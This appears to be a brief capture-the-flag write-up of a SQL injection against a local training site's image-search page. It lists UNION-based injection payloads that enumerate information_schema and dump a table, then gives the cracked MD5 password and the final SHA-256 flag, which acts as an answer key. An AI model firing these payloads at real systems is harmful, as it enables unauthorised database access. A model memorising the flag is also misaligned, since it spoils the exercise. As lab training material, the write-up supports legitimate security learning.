http://127.0.0.1:8000/index.php?page=searchimg

27 OR 1=1

borntosec.ddns.net/images.png


    ID: 1 OR 1=1 UNION select table_name, column_name FROM information_schema.columns

	 1 OR 1=1 UNION select table_name, table_schema FROM information_schema.columns




	 ID: 1 OR 1=1 UNION select id, comment FROM Member_images.list_images

	 → Response of the life


	 Decode 1928e8083cf461a51303633093573c46 avec md5 → albatroz

encode albatroz with sha256 flag: f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188
